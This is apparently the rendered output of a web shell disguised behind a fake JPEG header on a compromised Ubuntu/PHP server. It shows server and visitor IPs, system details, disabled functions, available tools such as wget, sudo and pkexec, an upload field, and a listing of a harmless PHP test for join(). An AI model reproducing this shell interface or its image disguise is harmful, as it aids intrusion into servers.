????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 3.144.115.20 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/home/b8009/php-5.6.22/ext/standard/tests/strings/ |
Upload File : |
--TEST-- Test join() function : usage variations - different values for 'glue' argument --FILE-- <?php /* Prototype : string join( string $glue, array $pieces ) * Description: Join array elements with a string * Source code: ext/standard/string.c * Alias of function: implode() */ /* * test join() by passing different glue arguments */ echo "*** Testing join() : usage variations ***\n"; $glues = array ( "TRUE", true, false, array("key1", "key2"), "", " ", "string\x00between", -1.566599999999999, NULL, -0, '\0' ); $pieces = array ( 2, 0, -639, -1.3444, true, "PHP", false, NULL, "", " ", 6999.99999999, "string\x00with\x00...\0" ); /* loop through each element of $glues and call join */ $counter = 1; for($index = 0; $index < count($glues); $index ++) { echo "-- Iteration $counter --\n"; var_dump( join($glues[$index], $pieces) ); $counter++; } echo "Done\n"; ?> --EXPECTF-- *** Testing join() : usage variations *** -- Iteration 1 -- string(91) "2TRUE0TRUE-639TRUE-1.3444TRUE1TRUEPHPTRUETRUETRUETRUE TRUE6999.99999999TRUEstring with ... " -- Iteration 2 -- string(58) "2101-6391-1.3444111PHP1111 16999.999999991string with ... " -- Iteration 3 -- string(47) "20-639-1.34441PHP 6999.99999999string with ... " -- Iteration 4 -- Notice: Array to string conversion in %s on line %d string(13) "key1Arraykey2" -- Iteration 5 -- string(47) "20-639-1.34441PHP 6999.99999999string with ... " -- Iteration 6 -- string(58) "2 0 -639 -1.3444 1 PHP 6999.99999999 string with ... " -- Iteration 7 -- string(201) "2string between0string between-639string between-1.3444string between1string betweenPHPstring betweenstring betweenstring betweenstring between string between6999.99999999string betweenstring with ... " -- Iteration 8 -- string(124) "2-1.56660-1.5666-639-1.5666-1.3444-1.56661-1.5666PHP-1.5666-1.5666-1.5666-1.5666 -1.56666999.99999999-1.5666string with ... " -- Iteration 9 -- string(47) "20-639-1.34441PHP 6999.99999999string with ... " -- Iteration 10 -- string(58) "2000-6390-1.3444010PHP0000 06999.999999990string with ... " -- Iteration 11 -- string(69) "2\00\0-639\0-1.3444\01\0PHP\0\0\0\0 \06999.99999999\0string with ... " Done